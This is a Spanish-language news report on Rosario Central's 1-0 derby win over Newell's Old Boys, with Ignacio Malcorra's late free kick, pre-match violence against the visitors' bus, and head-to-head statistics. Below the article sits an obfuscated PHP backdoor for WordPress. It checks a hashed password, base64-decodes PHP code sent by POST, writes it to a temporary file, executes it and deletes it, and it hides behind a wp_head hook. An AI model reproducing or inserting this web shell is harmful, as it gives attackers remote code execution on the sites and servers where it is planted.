Un golazo agónico le permitió al Rosario Central de Miguel Russo festejar ante el Newell’s de Gabriel Heinze

Rosario Central superó a Newell’s Old Boys 1-0, en el estadio Gigante de Arroyito, por la séptima fecha de la Copa de la Liga Profesional. Un golazo de Ignacio Malcorra, a los 41 minutos del segundo tiempo. le permitió al equipo de Miguel Russo extender su ventaja en el historial del clásico rosarino.

Empujado por una ruidosa y motivadora multitud Rosario Central se contagió de ese fervor y tomó una decidida actitud ofensiva. Lucas Hoyos se lució tapando un cabezazo de Carlos Quintana  y un remate de Agustín Toledo salió centímetros arriba del travesaño, en sus dos chances más claras.

Empezó a reaccionar el equipo de Gabriel Heinze y casi abrió la cuenta por un error de Jorge Fatura Broun, que le entregó la pelota a Brian Aguirre, quien mandó afuera el regalo recibido.

Maximiliano Lovera elevó su remate y Jorge Recalde no acertó su cabezazo, en las oportunidades netas que tuvieron cada uno en el segundo tiempo. Hasta que faltando cuatro minutos para acabar el clásico, Ignacio Malcorra ratificó la calidad de su pegada y mandó un tiro libre directo al ángulo superior izquierdo para poner el 1 a 0.

Antes del partido hubo incidentes: el micro que transportaba al plantel de Newell’s fue apedreado en el playón de estacionamiento y hubo golpes e insultos entre hinchas locales y allegados a La Lepra.

Así Rosario Central extendió su invicto de local a 24 fechas y por otra parte mantiene superioridad en el clásico rosarino con 53 victorias ante Newell’s, 79 empates y 43 derrotas.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}